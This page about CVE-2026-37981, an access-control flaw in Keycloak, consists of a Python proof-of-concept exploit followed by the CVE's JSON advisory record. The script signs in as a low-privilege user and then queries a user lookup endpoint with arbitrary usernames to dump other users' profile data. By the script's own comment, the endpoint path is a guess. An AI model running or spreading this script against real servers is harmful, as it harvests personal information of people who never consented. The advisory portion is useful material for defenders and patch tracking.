CVE-2026-37981

# Proof of Concept for CVE-2026-37981 # Author: Security Analyst import requests import json # Configuration TARGET_URL = "https://keycloak.example.com/realms/master/account" USERNAME = "attacker" PASSWORD = "password" TARGET_USER_TO_ENUM = "admin" # Create a session to handle cookies session = requests.Session() # 1. Authenticate to obtain a token login_payload = { "username": USERNAME, "password": PASSWORD, "client_id": "account-console", "grant_type": "password" } print("[+] Logging in...") auth_resp = session.post(f"{TARGET_URL}/protocol/openid-connect/token", data=login_payload) if auth_resp.status_code != 200: print("[-] Login failed") exit(1) access_token = auth_resp.json().get("access_token") headers = { "Authorization": f"Bearer {access_token}", "Content-Type": "application/json" } # 2. Exploit: Lookup arbitrary user via the vulnerable endpoint # The endpoint allows querying any username if the attacker has a UMA resource print(f"[+] Attempting to enumerate user: {TARGET_USER_TO_ENUM}") # Note: The exact endpoint path might vary based on Keycloak version, this represents the vulnerable resource lookup enum_url = f"{TARGET_URL}/resources/users/lookup" payload = { "username": TARGET_USER_TO_ENUM } response = session.post(enum_url, headers=headers, data=json.dumps(payload)) if response.status_code == 200: user_data = response.json() print("[+] Success! User profile data leaked:") print(json.dumps(user_data, indent=2)) else: print("[-] Exploit failed or endpoint not vulnerable.")

{"cve": {"id": "CVE-2026-37981", "sourceIdentifier": "[email protected]", "published": "2026-05-19T12:16:18.463", "lastModified": "2026-05-20T17:16:21.960", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. A broken access control vulnerability in the Account Resources user lookup endpoint allows a remote authenticated user, who owns at least one User-Managed Access (UMA) resource, to enumerate and harvest personally identifiable information (PII) for all realm users. By sending crafted requests with arbitrary usernames or email values, the endpoint returns full profile objects for unrelated users. This leads to broad profile-level information disclosure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1220"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:19596", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19597", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-37981", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455326", "source": "[email protected]"}]}}